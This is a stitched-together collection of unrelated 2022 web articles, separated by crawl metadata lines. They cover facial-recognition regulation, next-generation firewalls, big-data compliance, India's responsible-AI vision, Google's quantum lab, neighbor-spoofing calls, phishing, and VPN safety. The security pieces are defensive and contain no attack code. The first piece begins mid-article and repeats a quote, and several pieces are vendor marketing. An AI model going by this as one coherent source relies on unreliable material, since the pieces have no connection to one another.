Silicon Valley has had a complicated relationship with Congress and federal regulators for a long time, and large technology companies aren’t usually eager for more oversight or regulation of their businesses. But the use of facial recognition at the U.S. border and questions about biases and inaccuracies in the technology have contributed to a change in thinking in some parts of the tech industry. Last month, a group of Amazon employees sent a letter to Jeff Bezos, the company’s founder and CEO, asking him to stop selling Amazon’s facial recognition software to government and law enforcement agencies. Smith said the current political and social climate make regulation of this technology even more important, for both consumers and the organizations that deploy it.
“It seems especially important to pursue thoughtful government regulation of facial recognition technology, given its broad societal ramifications and potential for abuse. Without a thoughtful approach, public authorities may rely on flawed or biased technological approaches to decide who to track, investigate or even arrest for a crime,” Smith said.
“Governments may monitor the exercise of political and other public activities in ways that conflict with longstanding expectations in democratic societies, chilling citizens’ willingness to turn out for political events and undermining our core freedoms of assembly and expression. Similarly, companies may use facial recognition to make decisions without human intervention that affect our eligibility for credit, jobs or purchases. All these scenarios raise important questions of privacy, free speech, freedom of association and even life and liberty.”
“It seems especially important to pursue thoughtful government regulation of facial recognition technology, given its broad societal ramifications and potential for abuse."
The recent spread of facial recognition technology has raised a number of privacy and security concerns. Pervasive surveillance in public spaces is a reality in many parts of the U.S., and privacy advocates worry that combining video surveillance with facial recognition gives private companies and law enforcement the ability to track individuals through their daily lives without their knowledge.
“Congress should take immediate action to put the brakes on this technology with a moratorium on its use by government, given that it has not been fully debated and its use has never been explicitly authorized. And companies like Microsoft, Amazon, and others should be heeding the calls from the public, employees, and shareholders to stop selling face surveillance technology to governments,” said Neema Singh Guliani, legislative counsel at the American Civil Liberties Union.
In his post, Microsoft’s Smith laid out a number of questions that a potential congressional committee should consider, including whether law enforcement use of facial recognition should require human oversight, what laws can prevent the use of the technology for racial profiling, and whether the use of facial recognition be subject to minimum levels of accuracy. | <urn:uuid:fec580ea-ec5f-4481-95e9-446447efcfd2> | CC-MAIN-2022-40 | https://duo.com/decipher/microsoft-wants-federal-regulation-of-facial-recognition-technology | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00194.warc.gz | en | 0.948701 | 847 | 2.578125 | 3 |
At its core, a firewall is a network security system, either hardware- or software-based, that controls incoming and outgoing network traffic based on a set of rules.
We all know that there are many things a traditional firewall can do really well. For example:
- Blocks ports
- Allow outbound traffic
- Network address translation
On the other hand, there are many things a traditional firewall simply can’t do so well:
- Application firewall
- Intrusion prevention system
- SSL and SSH inspection
- Deep-packet inspection
- Application awareness – OSI Layer 4-7 attack mitigation
For the latter features and protection, a Next Generation Firewall (NGFW) is needed to provide more thorough edge security. Let’s talk about some of those features.
Application firewall, also known as a Web Application Firewall (WAF), is designed to help protect HTTP traffic. Common attacks are cross-site scripting (XSS) and SQL injection.
Intrusion Prevention System
“Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents…Intrusion Prevention System (IPS) is the process of performing intrusion detection and attempting to stop detected possible incidents. “ (NIST) IPS looks for bad activity on the network, both human and malware, to help prevent exploitation of weaknesses on the network or device.
SSL and SSH Inspection
A common malware strategy is to create a secure, out-bound connection to a command and control network in order to download their payload and become harmful. Leveraging Next Generation Firewall SSL inspection, the firewall is able to identify and block that outbound request rendering the infection toothless. Additionally, most traffic to common sites such as banks, Facebook, Google, Reddit, and Twitter enforce HTTPS connections (SSL) by default.
This traffic would not be able to be monitored through traditional firewalls. Common proxy services used to thwart conventional URL filtering also establishes a secure connection by default.
Being able to inspect this traffic at the firewall ensures compliance with corporate policy and helps protect from the exfiltration of data.
Anti-Malware adds a layer of protection at the edge to remediate known threats. Some firewalls communicate with a global threat center for rapid signatures. Others leverage third-party OEM software running within the appliance.
This is not designed to take the place of endpoint protection but augment it. It will not see issues originating from USB devices for example.
Application awareness is looking at the traffic and understanding what applications are generating it. This not only examines what the traffic is but looks for abnormalities and the way the application is working to see if the traffic generated is valid.
A basic example would be a Microsoft Word document making an HTTPS call to an outside server. In most cases, your document isn’t meant to act in this manner and would be blocked by the firewall.
The culmination and enablement of these features are what provide more complete protection at the edge over existing, and previous generation, firewalls. But as mentioned, firewalls alone are not complete protection but work in conjunction with a multi-layered strategy. If you’re looking to move your organization towards a more secure future, it’s time to start consider next-generation firewall technology.
Is your organization secured?
Having an intelligent security strategy is more important than ever. Our experts can help. | <urn:uuid:cd5ea71b-28b5-4c36-833f-a13d2b799b12> | CC-MAIN-2022-40 | https://microage.com/blog/i-have-a-firewall-i-am-protected/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00194.warc.gz | en | 0.916248 | 742 | 3.078125 | 3 |
According to a leading IT firm research nearly 90 percent of the data in the world has been produced in just the last two years. Though a bit of a buzz phrase these days, big data is as important as the internet itself to many businesses today, for a number of reasons. The simplest explanation of how big data benefits businesses is this: It provides the insights needed to make more confident decisions, take faster actions, improve operational efficiencies, minimize risks, and reduce spending.
The sudden emergence of the whole phenomenon around the data explosion has been the result of the pervasive use of mobile devices and the large volumes of data generated from web based purchases, mobile activities, and social media interactions. As the massive volume of data and computing platforms continues to proliferate, the absence of thorough reassessments and thinking around information processing paradigms of the past will leave today’s enterprises ill-prepared to deal with this new (IT) normal.
Enterprises have to realize the obvious fact that big data is an immensely powerful concept, and information is a strong business asset. Managing large volumes of homogenous data is something that organizations of all kinds can benefit from; spanning retail, social networking, science and research, clinical trials, CRM, operational activities, transactions and more. The real challenge for organizations today is to move beyond the data volumes and data storage obstacles to assess the true value of available data to reduce overall internal audit or compliance field work costs. The vast majority of enterprise businesses are faced with the challenge of decoding large volumes of homogenous, inconsistent, or inaccurate data — often referred to as “bad data.”
Industry analyst Doug Laney encapsulated the characteristics of big data using the three Vs — volume (the quantity of data), velocity (the rate at which data is generated and changed) and variety (the number of different data sources and types). Many are also adding characteristics such as “complexity,” “veracity” and “variability” to their understanding of the concept.
An accurate analysis of big data helps enterprises with better insights into their customers, market opportunities, growth prospects, and corporate performance. This strategic analysis of large volumes of data enables organizations to achieve higher-quality results in their own internal audit and compliance processes, thus enabling them to establish more effective governance, controls, and monitoring mechanisms.
With the skyrocketing number of transactions and evolving compliance requirements and regulations, big data analysis offers endless opportunities for enterprises to mitigate key governance, risk, and compliance issues. Just as big data analytics can lead to more targeted marketing initiatives by analyzing marketing program responses, supplier activities, customer demographics, and sales patterns, effective analysis of massive volumes of structured and unstructured data can also enable organizations in the Governance, Risk and Compliance (GRC) space to:
- Develop strong risk intelligence to strengthen risk management and streamline regulatory compliance
- Identify high-risk vendors/persons with multiple fraud risk indicators in accounts payable
- Display travel and entertainment expenses of local office employees
- Identify the best practices in the industry to effectively mitigate risks
- Determine if control procedures are working effectively
Big data analysis should become a core component of every organization’s operations, performed on a continuous basis, spanning areas such as payment or billing transactions, payroll, social media analysis, sales, operational processes, and compliance. For many organizations, especially in highly scrutinized and regulated industries such as healthcare, finance, and insurance, big data analysis can support Enterprise Risk Management (ERM) by helping monitor risks involving loans, claims, and patient care procedures.
Simply stated, integrating big data analytics into an organization’s GRC methodology will help pave the way for a truly data-driven organization. | <urn:uuid:e714d12a-c048-45cf-a1ef-14bb2f14d3cd> | CC-MAIN-2022-40 | https://www.metricstream.com/blog/governance-risk-compliance-and-big-data-advantage | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00194.warc.gz | en | 0.925464 | 766 | 2.5625 | 3 |
The goal of Technology is Success, but that success is for whom? The answer to this question can be a good starting point for a Responsible AI vision, developing which is still the responsibility of human intelligence.
Artificial Intelligence has produced many useful tools and devices for human use. Looking at AI as an increment in the continuous improvement cycle of computer science unlocks amazing opportunities for the future.
There are close to 1 billion people (15% of the global population) on earth who suffer some form of disability. And according to UN reports, in 2019, there were close to 703 million persons aged 65 or over in the world. Providing a few accessibility/disability features on their smartphones/devices is not enough. These billion and a half plus people are looking at AI efforts of the ‘able’ human minds with great hope and some of the applications of AI in the areas of expert systems, natural language processing, speech recognition, and machine vision, etc., still have a lot to do on their part.
AI is the product of the advancement in computer science, not its representative and like any other tech product, its usefulness for humanity needs to be checked and re-checked repeatedly, with an unbiased approach.
Current trends in AI development centered on four major themes: Internet, Business, Perception, and Autonomous Systems. And these trends produce some interesting headlines too, such as AI is beating Human players (in strategic maneuvers), AI is surpassing human doctors, solving decades-old biological research challenges, or producing the Humanoid capable of displacing us from our jobs and routine functions, etc. At the same time, there can be different perspectives to read these trends, which are often shaped by according to our worldview and socio-economic culture.
It is interesting to note that the global AI efforts were going on at their own pace till China had not entered the court, its entry into AI Game (more aggressively from July 2017) has changed the course of these efforts.
How China spoiled the GAME
If China would have not taken Alpha GO’s win over Chinese Go Champion Ke Jie so personally, the world would be at more peace with the AI! According to Dr. Kai Fu Lee, CEO of Sinovation Ventures and author of “AI Superpower” book, the AlphaGo victory “lit a fire under the Chinese technology community that has been burning ever since.” And he also writes that “when Chinese investors, entrepreneurs, and government officials all focus in on one industry, they can truly shake the world.” From 2017, China has accelerated the pace of AI investment and R&D activities on a historic scale. It is interesting to note that in less than two months of Ke Jie’s defeat from Alpha Go, the State Council of China launched the vision “A Next-Generation Artificial Intelligence Development Plan.” It describes AI as a “strategic technology” that has become a “focus of international competition” and projected that “by 2030 China would become the center of global innovation in artificial intelligence, leading in theory, technology, and application.”
The entry of this new aggressive player in the AI Game persuaded the other players to rethink/revise their approach. One can say that similar to defense and manufacturing supply chains China spoiled the spirit of healthy competition in this domain too. Since 2017, both leading players of this race, the USA and China, have adopted a different kind of tone and their approach often reflects desperation to prove something that is yet to happen.
Both sides often tend to prematurely announce the outcomes of their experiments and technological investigations, such claims create an undesirable hype which in turn is harming the potential of this useful invention.
Responsible AI – Different Versions
Today, Responsible AI is the latest buzzword in the industry, and all major tech companies have aligned their corporate strategy and vision to capture its spirit. A typical responsible AI corporate vision includes the elements of fairness, reliability, safety, privacy/security, inclusiveness, transparency, and accountability. And to deal with the potential AI risks, some big tech companies have now started advocating for a Human-Centered Design Approach too.
Several governments and intergovernmental organizations have laid out their Responsible AI policy initiatives and ethics guidelines as well. In 2017, the European Council called for a “sense of urgency to address emerging trends,” and earlier this year, it advocated for freedom and human rights in its recently proposed AI regulations, which explicitly says “AI should be a tool for people and be a force for good in society with the ultimate aim of increasing human well-being.”
Last year, Nature (an international science journal) published a study titled “The role of artificial intelligence in achieving the Sustainable Development Goals,” which highlighted that “AI can actively hinder 35% of UN SDG targets (59 out 169)” and it also stated that AI requires “massive computational capacity, which means more power-hungry data centers and a big carbon footprint.”
In June 2020, India became one of the founding members of OECD’s multi-stakeholder initiative – Global Partnership for Artificial Intelligence (GPAI), which has the goal of “guiding the responsible development of the AI, grounded in human rights, inclusion, diversity, innovation, and economic growth.”
These discussions around making AI more responsible also highlight the silent acknowledgment of the fact that somewhere this tech innovation was not designed by keeping the elements of responsibility and accountability toward humanity in mind.
This new kind of urgency around AI’s responsibility issue raises some important questions related to the lack of leadership in global AI efforts too! It is important here to note that all these global forums bet on India, for presenting a template of Responsible AI for the world.
The Indian Version
The story of Transforming India is a story of responsible use of digital technology too. In India’s Reform, Perform and Transform trajectory, digital technologies have played a significant part. With 130 crore Unique Identity numbers, 118 crore mobile subscribers, 80 crore internet users, and approx 43 crore Jan Dhan bank accounts, today India has the world’s biggest connected infrastructure and this infra is India’s key force in the fight against the corona pandemic too.
The difference in the approach of India and the West, on the questions of Responsibility reflects in their approach toward AI too.
In his 76th UNGA address, Prime Minister Narendra Modi talked about Pandit Deendayal Upadhyay’s Integral Humanism and he said “Integral Humanism is the co journey of development and expansion from self to the collective that is – expansion of the self, moving from individual to the society, the nation, and entire humanity.” Pandit Deendayal Upadhyay was of the belief that any system which obstructs the production activity of the people is self-destructive. He often used to say that “Man has stomach as well as hands. If he has no work for his hands, he will not get happiness even if he gets food to satisfy his hunger. His progress will be obstructed.”
This clarity guides the Responsible AI mission of India too. And it is this integrated viewpoint that makes India’s Responsible AI vision unique, practical, and more aligned with the key UN Sustainable Development Goals.
In 2018, NITI Aayog published the National Strategy for Artificial Intelligence, which identifies five core areas for the application of artificial intelligence: Healthcare, Agriculture, Education, Smart Cities, and Infrastructure, Smart Mobility, and Transportation. Prime Minister’s Science, Technology, and Innovation Advisory Council (PM-STIC) also launched a dedicated mission for Artificial Intelligence for enhancing the industry-academia interactions related to core research capability at the national and international level.
India believes that AI is a tribute to human intelligence and “the teamwork of AI with humans can do wonders for our planet,” as PM Modi rightly said at the RAISE (Responsible AI for Social Empowerment) 2020 summit.
When we minus the responsibility from technological innovation, we open up the gates for its weaponization. Are the benefits of Biotech research and experimentation are (in any way) lesser than Artificial Intelligence? In the continuing waves of the Corona pandemic, hidden a lesson for humanity.
‘Spiderman Ethics’ and dialogues like “with great power, comes great responsibility” have dominated the product/technology designs for decades, and we have seen their limitations too. To move forward from this point and for more clarity on ethical issues, a different kind of philosophy, mindset, and approach will be needed, and this is where India has a larger role to play! | <urn:uuid:9dcfc1f3-b877-4739-bf66-89d3a05de459> | CC-MAIN-2022-40 | https://www.dailyhostnews.com/responsible-ai-and-india | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00194.warc.gz | en | 0.954269 | 1,812 | 2.609375 | 3 |
Google’s Quantum Artificial Intelligence Lab, in partnership with scientists from several institutes in California, has launched its hardware initiative to design and build new quantum information processors based on superconducting electronics.
An alliance between Google, NASA Ames Research Center and the Universities Space Research Association (USRA), the Quantum Artificial Intelligence Lab explores quantum optimization as related to artificial intelligence.
A post on their research blog on Tuesday points out, “With an integrated hardware group the Quantum AI team will now be able to implement and test new designs for quantum optimization and inference processors based on recent theoretical insights as well as our learnings from the D-Wave quantum annealing architecture.”
Joining the Google team will be John Martinis and his research group at University of California Santa Barbara which has made recent advancements in building superconducting quantum electronic components of very high fidelity.
Google has been indulged in artificial intelligence for a while now, and Quantum computing is a sure step forward in this endeavour; the problem however lies in the absence of requisite hardware to make quantum computing possible.
Read more here.
(Image credit: Mark Knoll) | <urn:uuid:f104900f-087b-4411-a197-0cb6765cd80a> | CC-MAIN-2022-40 | https://dataconomy.com/2014/09/google-sets-quantum-computing-hardware-in-its-crosshairs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00194.warc.gz | en | 0.923917 | 232 | 2.96875 | 3 |
You’ve likely already been the target of a neighbor spoofing call — you just might not know it. This clever little trick has been on the rise since early 2016.
What Is Neighbor Spoofing?
Neighbor spoofing is the method of masking a phone number with a local area code so victims will believe they recognize (or should recognize) the number and feel safer in picking up the call. Scammers use this technique, also known as “spoofing,” to prey on unsuspecting victims. Once these bad actors have your customers on the line, they’ll start in on their same, old, and tired attempts to trick them out of their hard-earned dollars.
This is a strategic shift in traditional spoofing. In classic spoofing, a scammer will copy the first 5 or 6 digits of a company’s phone number with the hope of successfully posing as a local business. This change in strategy suggests that spam blocking providers like Hiya are successfully predicting neighbor scam calls. In response to effective anti-spam solutions, the scammers have attempted to continue the scam by switching to a less targeted strategy; by generalizing their approach, scammers hope they can go undetected and, therefore, keep the scam viable. Unfortunately, the scammers are right—predicting if a call is a neighbor spoof is much harder with 3 digits, as opposed to the traditional 6—but Hiya is up for the challenge.
Hiya has aggregated and anonymized data to create algorithms that effectively, and efficiently, identify area code-based neighbor scams. Our model instantly recognizes if the number in question belongs to a scammer and blocks calls (or marks them as spam) to protect consumers. Conversely, the model also identifies calls from legitimate businesses and ensures that calls from that number aren't mistakenly flagged as spam.
It’s not just consumers—and Hiya—that recognize neighbor spoofing as a problem. The Federal Trade Commission (FTC) is also aware and has made steps to resolve it. In 2019, they began a major crackdown on robocalls and spoofing through a variety of regulations, which led to a major decline in neighbor spoofing. Although it is impossible to completely stop phone spoofing, the decline shows that the FTC’s regulations initially made a substantial impact. However, in the last year, the number of neighbor calls have begun to rebound and even surpass their initial peak since the initial crackdown, as scammers have found ways around the new regulations, indicating that there is still lots of work to be done.
How to Stop Neighbor Spoofing
Although it is difficult to completely block neighbor spoofing and prevent your company’s phone numbers from being spoofed, there are a few steps you can take to minimize risk for your company.
- Find a secure voice performance platform that provides visibility and control over any of your numbers that have been spoofed.
- Display a branded caller ID to consumers to give them the confidence to answer calls from you.
- Get a free reputation analysis report from Hiya to see if any of your numbers are being spoofed.
Hiya’s network is 170 million users strong, due in part to strategic partnerships with AT&T, Samsung, Cricket Wireless, and other national providers. Hiya allows you to see how many times your number has been spoofed on our network, so you can make sure that your customers won’t fall victim to neighbor spoofing.
If you make more than 20,000 calls a month, see if any of your call center numbers have received negative (spam!) labels with a free Hiya Connect reputation analysis. Get additional information on how to stop your numbers from being spoofed with our How to Stop Spoofing eBook. | <urn:uuid:8d5f2aa6-ecaf-4b4a-87d1-d1131dcebf3e> | CC-MAIN-2022-40 | https://blog.hiya.com/the-evolution-of-the-neighbor-scam | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00394.warc.gz | en | 0.961877 | 778 | 2.71875 | 3 |
Phishing, a form of social engineering, is the most prevalent and persuasive attack vector used to steal confidential data, account passwords, credit card numbers and more.
We'll explore the various phishing forms, its devastating effects and actionable guidance to improve your team's cyber defenses in today's post.
Cybercriminals often masquerade themselves as a trusted source during a phishing scam to trick a victim into clicking on a malicious URL or downloading an attachment by conveying urgency in their messaging. Ultimately, this leads to compromised systems, data leaks, reputational damage and other calamitous outcomes.
Phishing is not only profoundly common, but it’s arguably the most destructive and high-profile cybersecurity threat facing organizations today.
- The 2020 Verizon Data Breach Investigations Report (DBIR) reported that internal actors caused 32% of data breaches, aka employees, for some industries.
- The same DBIR study found that phishing attacks continue to dupe users. Further, employee error, such as not implementing access controls on databases, leads to increased vulnerabilities and data leaks.
- Phishing emails are the #1 delivery vehicle for ransomware.
- Symantec 2019 Internet Security Threat Report (ISTR) found that formjacking attacks compromise 4,800 websites each month.
- Last year, the FBI received 467,361 internet crime complaints, which it estimates resulted in over $3.5 billion in losses, per the agency's 2019 Internet Crime Report.
- From C-level executives to individual contributors, anyone who opens an unknown email and trusts its content is vulnerable to this manipulation tactic.
Researchers at Symantec proposed that nearly one in every 2,000 of those emails is a phishing scam, implying that roughly 135 million phishing attacks are attempted daily. Most people don't have the time to scrutinize every message that lands in their inbox carefully, and that's precisely what phishers are hoping to exploit.
Let's examine some of the most common email scams:
Business Email Compromise (BEC)
- Various forms of lucrative BEC attacks enable threat actors to breach business email accounts more efficiently and rapidly. One method is CEO fraud, where an attacker has successfully compromised the CEO’s inbox and can send out emails from the legitimate email address. Another scenario involves a fake address that spoofs the CEO's email.
- Whaling demands a concerted effort; however, the high return level makes whaling attractive to scammers. Whaling attacks targets senior-level executive in an effort to capture sensitive information through the use of sophisticated, personalized language.
- Cybercriminals duplicate a legitimate email in a clone phishing attack and then incorporate nefarious links or attachments into the updated version while mirroring the original sender's information.
- A highly targeted attack personalized to the individual victim by addressing the person by their name or title. In a spear-phishing scam, hackers pretend to be CEOs, CFOs, or department leads and contact a specific group of employees, such as assistants. These messages appear urgent and use persuasive writing to ask the respondent to send highly confidential files or critical business information.
Mobile PhishingIn today’s connected world, scammers have shifted their focus towards smartphones as ideal attack vehicles. Examples of mobile phishing attacks include:
- Vishing is a subset of mobile phishing, whereas criminals typically use a spoofed ID to make a phone call, so it appears it's from a trustworthy source.
- During a smishing scam, attackers send an SMS message containing links to phishing web pages or applications that ask for credentials if visited. If you haven't yet, check out our article "Scam Alert: Criminals Cloning Hedge Fund Websites" to learn more about phishing websites.
- Attacks can also be initiated via email messages loaded in the browser of mobile devices. Unbeknownst to unsuspecting users, they download forged applications loaded with malware, and then crooks actively capture personal information and trick users into divulging passwords.
Tips to Avoid Phishing Scams
Social engineering is a psychological tool that takes advantage of patterns of human behavior. To help you outwit a cybercriminal, consider the following list of practical guidance:
- Stay informed about phishing techniques to mitigate the risk of getting snared. New phishing scams are emerging daily, so to avoid falling into a hacker's trap, consider staying abreast of the latest attack vectors.
- Look out for spelling and grammatical errors — frequent mistakes spotted in phishing communications. If you come across poor grammar in an email, there is a high probability it did not come from the official organization it is claiming to be.
- Speak with a Cybersecurity and Risk Management Specialist. Discover potential solutions for your organization, and learn about the differences between traditional and next-generation Cybersecurity Services.
- Do not click on links, download files, or open attachments in emails from unknown senders. It is best to open attachments only when you are expecting them, are certain the sender is credible and are confident in the message's content. Additionally, make sure you check the URL's legitimacy by hovering first, and if it seems even remotely questionable, don’t click on it.
- Never email personal or financial information, even if you are close to the recipient. You never know who may gain access to your email account or the person’s account to whom you are emailing.
- Be vigilant and avoid clicking on links to accept a prize you won for a competition you didn't participate in. Freebies and complimentary swag are attractive, so bad actors frequently use these ploys to trick people.
- Keep your browser updated. Security patches are routinely released for popular browsers in response to the security loopholes that phishers and other hackers exploit. If you habitually ignore messages about updating your browser, put a stop to that habit.
- Smartphone security best practices go a long way. To protect yourself, business accounts and personal information, always read app reviews before initiating downloads, keep smartphone security settings strict and consider adopting a reliable mobile security solution immediately.
Align Cybersecurity Services offer tailored, elegant and advanced cybersecurity solutions, encompassing Vulnerability Assessments / Penetration Testing, Cybersecurity Risk Management as a Service (Align Risk CSR), Customized Cybersecurity Programs, Third Party Management, Managed Threat Protection (Align Guardian), Cybersecurity Training and more.
This article has been updated and was originally written in 2018. | <urn:uuid:f6230885-4ff8-4e8b-ad8a-9a51cb390d1b> | CC-MAIN-2022-40 | https://www.align.com/blog/common-phishing-attack-methods-and-tips-to-avoid-scams | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00394.warc.gz | en | 0.920267 | 1,361 | 2.625 | 3 |
How Secure is a VPN?
Using a reliable virtual private network (VPN) can be a safe way to browse the internet. VPN security can protect from IP and encrypt internet history and is increasingly being used to prevent snooping on by government agencies. However, VPNs won't be able to keep you safe in all scenarios.
If you are asking what is VPN, it is a virtual network that enables an internet user to protect themselves and their organization by creating a private web browsing session. This is especially important when using public Wi-Fi to prevent other people from eavesdropping on the user’s online activity and the data and information they share. A VPN creates a secure tunnel between a user’s computer and the VPN server, which hides their online activity and location.
VPN security enables users to protect their online privacy and prevent their internet service provider (ISP) from tracking their browsing activity. It works by connecting a user’s device to the VPN server, then passing their internet traffic through the VPN provider’s internet connection. This hides browsing information and makes it more difficult for bad actors to gather or monitor the user’s online activity.
Is Private Browsing Really Private?
You might be asking yourself. "Do I really need a VPN when my browser has private browsing?"
Popular web browsers include a feature called private browsing, which enables users to browse the web without saving their history, search information, and temporary local data like cookies. Private browsing is available through top browsers, such as Apple Safari on Mac and iOS, Google Chrome’s Incognito mode, Mozilla Firefox, Opera, and Microsoft Edge’s InPrivate Browsing.
A browser's private browsing mode will prevent data from being stored on a user’s local device or computer. However, it does not necessarily prevent information from being shared between the user’s device or computer and their ISP. Furthermore, third parties may be able to detect users’ activity through private browsing sessions, which they can use to exploit their operating system.
5 Reasons Why Free VPNs Are Not Safe
"Is VPN safe?" is a question everyone should be asking, and the answer is straightforward. Using free software is not an effective solution for ensuring VPN security because it often will not protect data and browsing activity on the internet. Key reasons not to use a free VPN include:
- Free VPN tools compromise user security: Many free VPN tools contain malware that could be used by cyber criminals to steal users’ data, gain unauthorized access to their data or machine, or launch a cyberattack. Research report from the ICSI Networking and Security Group found that 38% of the 283 Android VPN apps studied contained some form of malware presence. Therefore, a VPN application may not always be safe when using free tools.
- Free VPN tools track online activity: A secure VPN should protect a user’s activity while they browse the internet, but some free VPNs do the opposite by tracking users’ online activity. The same ICSI research found that 72% of the free VPN services analyzed embedded third-party tracking tools in their software. This enables VPN tools to collect user information and sell it for a profit to the highest bidders, which allows advertisers to target free VPN users with ads. Some free VPN tools hide information about whether they share or sell user data, but others say so in their privacy policies.
- Free VPN tools limit data usage: VPNs are great for protecting data or hiding a user’s location when watching a movie from a streaming service that is not available in their region. However, a free VPN typically limits the amount of data users can use through the tool. This could include limiting the amount of data they can use per month, limiting the amount of time the VPN is available per browsing session, or unblocking certain websites only. Therefore, free VPN tools are not ideal for people who want to protect their data or mask their location for a considerable length of time.
- Free VPNs slow down users’ internet speed: Similar to the data-limiting issue above, free VPNs may provide slower internet speeds than premium tools. Even free VPN options from reputable vendors will provide a slower internet connection than available through their paid-for options. They will also prioritize internet speeds for their paying customers, which can further slow down their free services.
- Free VPN tools target users with ads: Free VPNs also use advertising to generate revenue, which means users’ data can be shared or targeted without their permission. This is frustrating for users because ads can also slow down the user’s internet connection or contain malware. The presence of ads on a free VPN service can also be a privacy concern because it is likely the provider is sharing users’ online activity with third-party services. Paid-for VPNs include ad-blocking tools, as well as features like malware protection and unlimited bandwidth, which keep users’ data secure.
Which Features Make a Secure and Safe VPN?
The question of how secure are VPN services typically depends on the VPN being used. A VPN from a reliable provider will feature encryption for the user's data and online browsing history to shield them from hackers and ISPs.
Is using VPN safe? That is reliant on a provider that ensures online privacy, provides transparent privacy policies, fixes data leaks, and does not track its users. The best VPN tool or application contains the following features:
- Internet Protocol (IP) address leak prevention: The core purpose of a VPN is to hide or disguise a user’s IP address and prevent anyone from tracking their online activity. However, a VPN can sometimes include flaws that result in the user’s IP location being leaked. It is therefore important to look for a provider that actively prevents IP address leaks. Check reviews online to see if they have a history of IP address leakage.
- No information logging: No-log VPNs do not collect, or log, data that users share on the network, such as login credentials, files they download, and their search history. This is key to ensuring users’ online privacy and protecting their anonymity from other internet users. It also ensures that a user’s information is protected, even if an attacker gains unauthorized access to a VPN tool. When considering a VPN, check whether it logs online activity, logs and periodically purges data, or discloses user information in any other scenario.
- VPN kill switch: In case a VPN connection drops, the user’s internet access will switch to their regular connection. A VPN kill switch feature automatically exits specific programs if an internet connection becomes unstable to reduce the risk of sensitive data being leaked by applications.
- Multi-factor authentication (MFA): Any VPN program should be as secure as possible to ensure that only authorized users can gain access to it. MFA enables a user to prove their identity, that they are who they say they are, before they are given access to the VPN. For example, upon logging in to the VPN using their username and password, the user can then be sent a code via Short Message Service (SMS) or a notification that they can approve on their mobile phone. This extra level of security ensures only the right people can access a VPN and makes it more difficult for a hacker to intercept.
How Fortinet Can Help?
Fortinet provides a range of secure VPN tools with its FortiGate Internet Protocol security (IPsec)/secure sockets layer (SSL) VPN solutions. The FortiGate VPN offerings are high-performance, scalable VPNs that provide users and organizations with access control and consistent security policies across all their applications, devices, and locations.
The FortiGate VPNs offer secure communication between multiple endpoints and networks through IPsec and SSL technologies. This ensures that users’ data is protected in high-speed motion, which prevents them from falling prey to data breaches or cyberattacks such as man-in-the-middle (MITM) attacks. | <urn:uuid:9f78c202-e23a-4f3c-9ec2-bbfda3213aec> | CC-MAIN-2022-40 | https://www.fortinet.com/resources/cyberglossary/are-vpns-safe | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00394.warc.gz | en | 0.918573 | 1,639 | 2.625 | 3 |
At the beginning of May, a massive phishing scam hit Gmail users. The scam came in the form of an email (from someone the Gmail user had communicated with previously) with a link to open a Google document. If a user clicks on the link to the Google doc and logs into their Google account, hackers are able to steal account information, contact, passwords and more from the account. Luckily, Google was able to react quickly and very few users were affected by the scam. However, this is not the only phishing scam and it won’t be the last time a major platform is hit by a phishing scam. In fact, phishing scams are some of the oldest scams on the Internet but even though they are well known, they are still very effective. Here are the top eight ways to protect yourself and your company from phishing scams: 1. Be cautious with emails that request personal information Your bank, healthcare provider, the IRS and credit card company will not ask for personal information via email. Also, companies like Facebook or Gmail will not ask for passwords in emails. Do not click on any links or download attachments that request your personal information. 2. If you are unsure, call the company If you receive an email and are truly unsure whether or not the request is legitimate, call the company that is supposedly sending the email. If you can’t call the company (like Facebook), then log on to their website and use their Help feature to learn if the request is legitimate. 3. Know how to identify a fake email Most of us are in a hurry or multitasking when we are checking our email. Hackers know this and they are very good at creating emails that look very professional or similar to the real email addresses. But if you look closely, you will almost see a type or contact address that is off so take the time to pay attention to the sender before you open or click a link. 4. Be wary with links within email Unless you are completely certain that the email is from a trusted source, be cautious about links in email. Instead of clicking a link, open new browser and type the URL directly into the address bar. Phishing links are usually masked as legitimate links but then can redirect you to a different site 5. Keep your browser up to date Popular browsers often update to include the latest security patch. Browsers are constantly observing phishing scams and vulnerabilities and updating to protect their users against these new scams. If you haven’t updated your browser, even if you are getting a reminder, now might be the time. 6. Create a SPAM filter for your emails SPAM filters can help protect against viruses or blank senders so that suspicious emails never even reach your inbox. 7. Use pop-up blockers Not all phishing attacks happen through emails. Many hackers use pop-ups as the source of phishing scams. Pop-up blockers can help protect you from unwanted pop-ups when you are browsing. 8. Check your accounts on a regular basis Most phishing scams are aimed at obtaining financial account information. Be certain that you are regularly checking your accounts for any suspicious behavior. The most important piece of advice against phishing attacks is to remain alert. Even though many of these scams seems simplistic and are easy to spot, many of them are quite sophisticated. Stay alert when checking your emails from anyone and train your team to do the same and you can decrease the threat of phishing attack. 
| <urn:uuid:e8251e30-d036-453e-9022-b1f7b1ebed82> | CC-MAIN-2022-40 | https://gxait.com/business-strategy/prevent-phishing-scams-attacking-business/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00394.warc.gz | en | 0.951416 | 699 | 2.53125 | 3 |
Safe Software: Making the Impossible Possible Using Spatial Data
